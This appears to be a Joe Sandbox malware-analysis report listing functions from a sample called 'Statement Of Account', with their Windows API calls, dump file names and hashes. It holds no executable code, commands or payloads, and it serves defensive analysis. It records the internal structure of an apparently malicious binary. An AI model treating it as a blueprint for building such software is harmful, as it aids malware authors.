
Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
__isleadbyte_l.LIBCMT ref: 004238B2
MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55

Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
GetLastError.KERNEL32(?,00000000), ref: 0045D12B
DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68

Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
__itow.LIBCMT ref: 00461461
__itow.LIBCMT ref: 004614AB

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$__itow$_wcslen
String ID:
API String ID: 2875217250-0
Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB

Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00472806

Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F

GetCaretPos.USER32(?), ref: 0047281A
ClientToScreen.USER32(00000000,?), ref: 00472856
GetForegroundWindow.USER32 ref: 0047285C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795

Function 0045552E Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyCursor.USER32(?), ref: 0045566A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DeleteObject$CursorDestroyMoveWindow
String ID:
API String ID: 3883585953-0
Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69

Function 0046FF12 Relevance: 6.1, APIs: 4, Instructions: 77windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FF1D
SendMessageW.USER32(?,00001303,00000000,00000000), ref: 0046FF7B
SendMessageW.USER32 ref: 0046FFBA
DestroyCursor.USER32(?), ref: 0046FFCC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$CursorDestroyExtractIcon
String ID:
API String ID: 1216984388-0
Opcode ID: 317c6088c103e71675824f08105c26182ca0c8a94683eb5d1f55e72f19be716d
Instruction ID: 5774e549fe23b70f7ddb20da7ab5c74696e2cf490f7d8532ec6e8e804971e2f4
Opcode Fuzzy Hash: 317c6088c103e71675824f08105c26182ca0c8a94683eb5d1f55e72f19be716d
Instruction Fuzzy Hash: 7121F475240304AFE350DB24DC85FABB7A4FB88710F00482EFA8597291DBF9A845CB66

Function 00439326 Relevance: 6.1, APIs: 4, Instructions: 72processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25

Function 00459DCF Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00459DEF
GetForegroundWindow.USER32 ref: 00459E07
73A0A570.USER32(00000000,?,00000000,00000000), ref: 00459E44
GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$A570ForegroundPixel
String ID:
API String ID: 3422921477-0
Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9

Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 0045890A
__WSAFDIsSet.WS2_32(00000000,00000000), ref: 00458919
accept.WS2_32(00000000,00000000,00000000), ref: 00458927
WSAGetLastError.WS2_32(00000000), ref: 00458952

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99

Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1

Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
GetStockObject.GDI32(00000011), ref: 00433695
SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
ShowWindow.USER32(00000000,00000000), ref: 004336BA

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$CreateMessageObjectSendShowStock
String ID:
API String ID: 1358664141-0
Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9

Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004441B8
MessageBoxW.USER32(?,?,?,?), ref: 004441F6
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
CloseHandle.KERNEL32(00000000), ref: 00444213

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6

Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00434037
ScreenToClient.USER32(?,?), ref: 0043405B
ScreenToClient.USER32(?,?), ref: 00434085
InvalidateRect.USER32(?,?,?), ref: 004340A4

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2

Function 00424E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00424E59

Part of subcall function 00424C7E: __fltout2.LIBCMT ref: 00424CAA

__cftog_l.LIBCMT ref: 00424E7F
__cftoe_l.LIBCMT ref: 00424EB1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85

Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00436A45

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

__wsplitpath.LIBCMT ref: 00436A6C
__wcsicoll.LIBCMT ref: 00436A93
__wcsicoll.LIBCMT ref: 00436AB0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
String ID:
API String ID: 1187119602-0
Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6

Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00437B15
_wcslen.LIBCMT ref: 00437B1D

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

_wcscpy.LIBCMT ref: 00437B46
_wcscat.LIBCMT ref: 00437B4D

Memory Dump Source

